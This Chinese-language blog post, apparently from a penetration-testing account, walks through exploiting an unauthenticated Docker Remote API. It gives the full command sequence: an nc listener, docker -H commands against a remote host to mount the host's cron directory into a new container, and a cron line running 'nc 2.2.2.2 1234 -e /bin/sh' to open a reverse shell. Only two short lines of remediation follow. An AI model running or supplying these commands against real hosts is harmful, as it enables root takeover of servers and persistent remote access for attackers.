Docker未授权访问漏洞利用

a4afc64080b3044c0b13d65a725fcd5b.gif

点击"仙网攻城狮”关注我们哦~

不当想研发的渗透人不是好运维3067d84a5446d9350b501541677a9f9f.png

让我们每天进步一点点

简介

Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。

Docker Remote API 是一个取代远程命令行界面(rcli)的REST API。Docker Remote API如配置不当可导致未授权访问,攻击者利用 docker client 或者 http 直接请求就可以访问这个 API,并且可以执行Docker命令。

实战

1.使用nmao或者fofa来发现端口或者服务。

4ee45c81d2a882fc1619408942dfad99.png

2.web方法查看是否存在漏洞,直接在浏览器中输入1.1.1.1:6066/version访问即可,web方法比较局限大部分只能获取敏感信息。

760c2f9c9d6df1cf7f1809727be71069.png

3.使用docker客户端连接执行命令反弹shell

#攻击机上开启nc监听反弹shellnc -vv -l -p 1234
# 查看宿主机可用镜像docker -H tcp://1.1.1.1:6066 image

# 选择合适镜像创建容器,并将宿主磁盘挂载到容器中(注意标红参数是镜像id)
docker -H tcp://1.1.1.1:6066 run -it -v /var/spool/cron/:/var/spool/cron/ image_id /bin/bash# 查看运行容器信息docker -H tcp://1.1.1.1:6066 ps# 启动刚刚创建的容器并连接(注意标红参数是容器id)
docker -H tcp://1.1.1.1:6066 start ct_id
docker -H tcp://1.1.1.1:6066 exec -it --user root ct_id /bin/bash

# 执行shell反弹命令(2.2.2.2是nc反弹ip,定时任务路径也要根据系统来)
root@0d99a9b2e66b:/#sh -c "echo '* * * * * /usr/bin/nc 2.2.2.2 1234 -e /bin/sh'">> /var/spool/cron/root

3ea566cca6e9838d1840fad1a90c0500.png

4.修复方法:

配置白名单不要将端口开放到外网

配置鉴权开启tls

往期内容

Redis未授权漏洞利用

工具篇-BurpSutie Pro 2021.10.1最新版本

2021湖北省工匠杯预赛WriteUP

aaed76b9cfc7918bdd88bab37aa1d41e.gif

cdcb2b3d7053bdf348eefad7940a7f2c.gif

更多资讯长按二维码 关注我们

觉得不错点个“赞”呗04a9691c1a7094443842e3a09a194e91.png      

  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值